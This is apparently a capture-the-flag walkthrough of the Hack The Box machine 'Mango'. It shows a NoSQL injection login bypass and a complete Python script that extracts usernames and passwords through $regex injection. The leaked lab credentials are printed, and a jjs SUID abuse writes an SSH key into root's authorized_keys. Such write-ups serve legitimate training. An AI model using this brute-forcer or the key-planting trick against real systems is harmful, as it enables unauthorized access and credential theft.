Mango HTB
IP
10.10.10.162
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.162 | cut -d"/" -f1 | tr '\n' ','
we have the following ports open on the machine
22,80,443
Lets run a more in-depth scan of the target
sudo nmap -sCV -p22,80,443 -oA nmap_results 10.10.10.162
results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn:
|_ http/1.1
|_http-title: Mango | Search Base
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
Service Info: Host: 10.10.10.162; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.94 seconds
we can see
SSH is running on the target
Both HTTP and HTTPS is running on the target
Most likely a ubuntu machine\
Looks like we have the domain name and a hostname name
mango.htb
andstaging-order.mango.htb
we will add these to our hosts file
Lets check out Port 443 first

Looks like some kind of search engine
Lets get feroxbuster running and see if we can find anything
feroxbuster -u https://mango.htb:443 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -k -o dirs.txt
results
200 GET 216l 514w 5152c https://mango.htb/index.php
200 GET 15331l 41447w 397607c https://mango.htb/analytics.php
200 GET 216l 514w 5152c https://mango.htb/
Looking at the ssl certificate we can see the following

we can see a email
admin@mango.htb
We could test this search base for any injection attacks using sqlmap
first lets catch a request with burp, save the request to a file
run
sqlmap
on the request we saved
sqlmap -r r.txt --batch --force-ssl --level=5
HTTP
when we check out staging-order.mango.htb
we can see a login screen

Lets bust out feroxbuster and see if we can find anything
feroxbuster -u http://staging-order.mango.htb -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs_http.txt
Nothing interesting
Lets catch the login request with burp

Lets save this as a file and run sqlmap, we want to find if this is vulnerable to any injection type of attacks
sqlmap -r login.req --batch
Nothing interesting
I'm going to take a guesse and say this web application utilises mongo NoSQL given the name of the box and well the pictures of the mangos
Lets run with this so first we need to check if this is indeed vulnerable to an injection attack
here is a blog that explains this better then i could
alright we have a request of the login in burp we send that over to repeater

Now what we can do to bypass authentication is the following

notice the [$ne]
, this is a common operator within NoSQL meaning 'not equal to' now we are essentially saying
username is not equal to 'shrek123'
password is not equal to 'shrek123'
because both of these statements are true, we are authenticated to the page

not much here
since we know we have a injection point within the login prompt, maybe we can dump some passwords
we can utilise the $regex
filter
for example we can see if the first letter of the user admin's password is x
username=username&password[$regex]=^x.*&login=login
Now lets create a python script to brute force the usernames and passwords
import sys
import string
import requests
class MangoBruteForcer:
def __init__(self, url):
#Constructor to initialize the class with the target URL
self.url = url
def brute_password(self, user):
#Function to brute force the password for a given username
password = ""
while True:
#Iterate over each character in the ASCII letters, digits and punctuations
for c in string.ascii_letters + string.digits + string.punctuation:
#Skip apecial characters that may interfere with the URL
if c in ["*", "+", ".", "?", "|", "\\"]:
continue
#Display the current password attempt in the console
sys.stdout.write(f"\r[+] Password: {password}{c}")
sys.stdout.flush()
#Send a POST request to the target URL with the current username and password regex
resp = requests.post(
self.url,
data={
"username": user,
"password[$regex]": f"^{password}{c}.*",
"login": "login",
},
)
# Check if the response indicates a successful login attempt
if "We just started farming!" in resp.text:
# If successful, update the password and make a final login attempt
password += c
resp = requests.post(
self.url,
data={"username": user, "password": password, "login": "login"},
)
#Check if the final login attempt is successful
if "We just started farming!" in resp.text:
#Print the found password and return from the function
print(f"\r[+] Found password for {user}: {password.ljust(20)}")
return
def brute_user(self, res):
# Function to brute-force the username and call brute_password on each attempt
found = False
for c in string.ascii_letters + string.digits:
# Display the current username attempt to the console
sys.stdout.write(f"\r[*] Trying Username: {res}{c.ljust(20)}")
sys.stdout.flush()
# Send a POST request to the target URL with the current username regex
resp = requests.post(
self.url,
data={
"username[$regex]": f"^{res}{c}",
"password[$gt]": "",
"login": "login",
},
)
# Check if the response indicates a successful username attempt
if "We just started farming!" in resp.text:
found = True
self.brute_user(res + c)
if not found:
print(f"\r[+] Found user: {res.ljust(20)}")
self.brute_password(res)
if __name__ == "__main__":
try:
target_url = "http://staging-order.mango.htb/"
brute_forcer = MangoBruteForcer(target_url)
initial_user = ""
brute_forcer.brute_user(initial_user)
except Exception as e:
print(f"Error: {e}")
Now Lets run this script

we have 2 users and associated password
[+] Found user: admin
[+] Found password for admin: t9KcS3>!0B#2
[+] Found user: mango
[+] Found password for mango: h3mXK8RhU~f{]f5H
[*] Trying Username: 9
Lets see if we can ssh into the machine'
ssh mango@10.10.10.162
we have a SSH session as mango

if we look within the home directory we can see both admin and mango

Lets see if we can switch our user to admin, using the admin password we found
su admin
we are admin, but we dont have sudo privileges on the machine

When we search for SUID files, we can see the following
find / -type f -perm /4000 2>/dev/null
we do find something interesting
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
what we can do is write to a file (/root/.ssh/authroized_keys
) and drop a SSH key into the file and ssh in as root, to do this
Let's generate some keys
mkdir .ssh
ssh-keygen

Lets create a exploit script using the knowledge from gtfobins
copy the location of the authorized_keys file
/root/.ssh/authorized_keys
copy our public key so it can be written to authorized_keys
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDlS7FNv4N/P3/iUoWjOi/35AK8dXaDiS/Aq9S8h3nmdiYCIl0FOCWu1npPKN/mfzs3rtTtuk3AjMFsVByrpJpWcH77zpe72z/ZTA2Pn3ZHW5PjZYWJ9QvE9PiinIPAC4kt7H9DpRiu37mN+HWpB0g6OMHMLQWNYKcou7rhLnn1eNhB4rCOUvCG2jTTNt0muYzAPZ3LB1TNI0eWVZBevAlXIXrlpeCGmWAzxT+lcTHD7a7zbYg/EMeeKwk3KDfQy83C9yOUDYM6d8IVV75avly49bFt/SOJyqLXo2WXeRXEyOQvOqIi3LoiuP6JR6EdQtX4FRA38ECs+DnEObW/1tIaR3AATM1T23mdmBNnAr9ZJzwFlBkILXX4HQnmzfDTrbBwEj3lgGBKDZp80dU7yUjrs1jkVOhaD34qbeX+ARzyAQwP9LRnVmyNoBH2oCaDs0suchmisvNm/wqfcjkEUSeBQ/HUiRsUbnxUZB6a7HrKiSVP6ap3RCP3gTPn3xT5F/k=");
fw.close();' | jjs
copy and past the exploit in our SSH session

Lets give our private key the necessary permissions and SSH into the machine as root
chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.162
we are now root

Last updated